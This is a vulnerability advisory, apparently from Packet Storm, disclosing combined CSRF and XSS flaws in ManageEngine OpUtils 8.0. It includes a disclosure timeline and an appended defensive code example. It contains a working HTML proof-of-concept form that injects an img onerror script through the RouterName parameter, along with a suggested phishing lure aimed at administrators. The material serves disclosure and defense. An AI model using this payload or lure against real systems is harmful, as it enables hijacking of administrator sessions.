
Manage Engine OPutils 8.0 Cross Site Request Forgery / Cross Site Scripting

Date: 16 Feb 2016 00:00:00
Reported by: Kaustubh G. Padwad
Type: packetstorm
Source: packetstormsecurity.com
Views: 32

Manage Engine OPutils 8.0 Cross Site Request Forgery / Cross Site Scripting vulnerability in network management software allows admin account hijacking.

Code
`==================================================  
CSRF and XSS In Manage Engine OPutils  
==================================================  
  
.. contents:: Table of Contents  
  
Overview  
========  
  
* Title : CSRF and XSS In Manage Engine OPutils  
* Author: Kaustubh G. Padwad  
* Plugin Homepage: https://www.manageengine.com/products/oputils/  
* Severity: HIGH  
* Version Affected: Version 8.0  
* Version Tested : Version 8.0  
* version patched:   
  
Advisory ID  
============  
2016-01-Manage_Engine  
  
Description   
===========  
  
About the Product  
=================  
  
OpUtils is a Switch Port & IP Address Management software that helps network engineers manage their Switches and IP Address Space with ease. With its comprehensive set of 30+ tools, it helps them to perform network monitoring tasks like detecting a rogue device intrusion, keep a check on bandwidth usage, monitoring availability of critical devices, backing up Cisco configuration files and more.  
  
  
Vulnerable Parameter   
--------------------  
1. RouterName   
2. action Form  
3. selectedSwitchTab  
4. ipOrHost  
5. alertMsg  
6. hostName   
7. switchID  
8. oidString  
  
About Vulnerability  
-------------------  
This application is vulnerable to a combined CSRF/XSS attack: if an admin user can be tricked into visiting a crafted URL created by the attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into the admin page. Once exploited, the admin's browser can be made to do almost anything the admin user could typically do, for example by hijacking the admin's cookies.  
  
Vulnerability Class  
===================   
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)  
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))  
  
Steps to Reproduce: (POC)  
=========================  
  
* Add the following code to a web server and send that malicious link to the application admin.  
* The admin must be logged in when he clicks on the link.  
* Social engineering might help here.  
  
For example :- "Device password has been changed, click here to reset"  
  
####################CSRF Code#######################  
<html>  
  
<body>  
  
<form action="http://192.168.1.10:7080/DeviceExplorer.cc">  
  
<input type="hidden" name="RouterName" value="kaus"><img src=a onerror=confirm("Kaustubh")>tubh" />  
  
<input type="submit" value="Submit request" />  
  
</form>  
  
</body>  
  
</html>  
  
  
  
Mitigation   
==========  
Upgrade to next service pack  
  
  
Change Log  
==========  
  
  
Disclosure   
==========  
28-January-2016 Reported to developer  
28-January-2016 Acknowledgement from developer  
11-February-2016 Fixed by vendor ()  
  
Credits  
=======  
* Kaustubh Padwad   
* Information Security Researcher  
* [email protected]   
* https://twitter.com/s3curityb3ast  
* http://breakthesec.com  
* https://www.linkedin.com/in/kaustubhpadwad  
`
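The advisory's only mitigation is "upgrade to next service pack". As an added example (not the vendor's code and not part of the advisory), the block below shows the class of bug behind the listed vulnerable parameters, the unescaped reflection of RouterName into an HTML attribute that the PoC's `"><img ...>` value breaks out of, beside a hardened handler that accepts the state change only over POST with a per-session synchronizer token and escapes the value for the attribute context. `Session`, `render_vulnerable`, `render_hardened` and `tag_injected` are hypothetical names; the payload string is constructed from the PoC in the advisory.

```python
import hmac
import html
import secrets

# Constructed RouterName value mirroring the advisory's PoC: it closes the
# value="..." attribute and injects an <img onerror=...> handler.
PAYLOAD = 'kaus"><img src=a onerror=confirm("Kaustubh")>tubh'


def render_vulnerable(form: dict) -> str:
    """Reflects RouterName into an HTML attribute unescaped and accepts any
    request, the class of bug the advisory reports (illustrative only,
    not the vendor's actual code)."""
    router = form.get("RouterName", "")
    return f'<input type="text" name="RouterName" value="{router}">'


class Session:
    """Hypothetical server-side session holding a per-session anti-CSRF token."""

    def __init__(self) -> None:
        self.csrf_token = secrets.token_urlsafe(32)


def render_hardened(form: dict, session: Session, method: str) -> str:
    """Hardened handler: state change only via POST, synchronizer token must
    match the session, and the reflected value is escaped for the attribute
    context (hypothetical mitigation, not the vendor's service pack fix)."""
    if method != "POST":
        # A plain link or an auto-submitting GET form like the advisory's PoC
        # never reaches the state-changing code path.
        return "405 Method Not Allowed"
    token = form.get("csrf_token", "")
    # Constant-time comparison; a cross-site form cannot read the session token.
    if not hmac.compare_digest(token, session.csrf_token):
        return "403 Forbidden: missing or invalid CSRF token"
    # quote=True also encodes " and ', so the value cannot close the attribute.
    safe = html.escape(form.get("RouterName", ""), quote=True)
    return f'<input type="text" name="RouterName" value="{safe}">'


def tag_injected(markup: str) -> bool:
    """True if an <img ...> element appears in the rendered markup, i.e. the
    attribute breakout succeeded."""
    return "<img" in markup.lower()
```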
